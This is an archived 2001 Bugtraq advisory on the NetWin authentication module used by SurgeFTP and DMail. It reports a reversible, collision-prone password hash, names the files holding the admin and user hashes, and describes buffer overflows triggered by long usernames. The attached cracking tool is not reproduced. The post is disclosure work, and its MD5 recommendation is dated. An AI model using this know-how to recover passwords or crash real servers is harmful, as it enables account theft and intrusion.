[21721] in bugtraq
NetWin Authentication Module 3.0b password storage vulnerabilities / buffer overflows
daemon@ATHENA.MIT.EDU (ByteRage)
Fri Jul 20 11:14:36 2001
Message-ID: <20010720132417.23494.qmail@web13003.mail.yahoo.com>
Date: Fri, 20 Jul 2001 06:24:17 -0700 (PDT)
From: ByteRage <byterage@yahoo.com>
To: bugtraq@securityfocus.com
AFFECTED SYSTEMS
NWAuth module as used by
DMail, SurgeFTP and others (cf. www.netwinsite.com).
I've tested SurgeFTP in particular.
The source code for NWAuth 2.0 can be found at
http://www.netwinsite.com/dmail/nwauth.htm
The source is provided on all platforms and for
Windows and most Unix based platforms it is
pre-compiled, as nwauth.exe or nwauth.
DESCRIPTION
The 'NetWin Authentication module' which is used by
SurgeFTP, DMail and other programs uses a quite
'unusual' hashing algorithm to store the password
hashes. Because of the complexity of the hashing
algorithm, the users of NWAuth may not be aware of it,
but the algorithm is flawed in (at least) two ways:
1) the password hashes can be decrypted
2) one hash can match more than one password
So basically I'm saying that one user doesn't have one
password, but he can have a few million besides the
one that he was actually assigned. (no comment...)
Fortunately, SurgeFTP has some anti-hammering
techniques implemented to prevent bruteforcing.
As for the decryption, I've attached source code
(nwauthcrack.c) that will generate all possible
passwords for a given hash. The password hashes used
by e.g. SurgeFTP can be found within the files
\surgeftp\admin.dat (sysadmin password) and
\surgeftp\nwauth.clg (user passwords).
Storing the passwords using MD5 hashes would probably
be a better idea, perhaps combined with a simple cipher
to prevent the average script kiddie from attacking
the password file with canned tools. (This type of
hashing is done by Serv-U FTP.)
And if one really wants to implement salting, then
append the username to the password and feed it into
the MD5 hashing algorithm: it has the same effect,
it's easier and it's much more secure.
=-=-
NWAuth also has a lot of buffer overflows riddled
throughout the source code (especially older versions,
like 2.0), which might lead to serious flaws in
programs that use this module. Although version 2.0
probably contained many more of them, here are some
examples of buffer overflows which are still not fixed
in version 3.0b:
-> the nwauth -del command causes an access violation
when supplied with a very long username; this might
not be a big deal since only administrators are
supposed to delete users
-> the nwauth -lookup command causes an access
violation when supplied with a username of about 1000
characters; this might be triggered by an attacker if
the program passed this username on from a "USER"
command
greetz,
[ByteRage] byterage@yahoo.com
[http://byterage.cjb.net]
[Attachment: nwauthcrack.c (contents not reproduced in this archive copy)]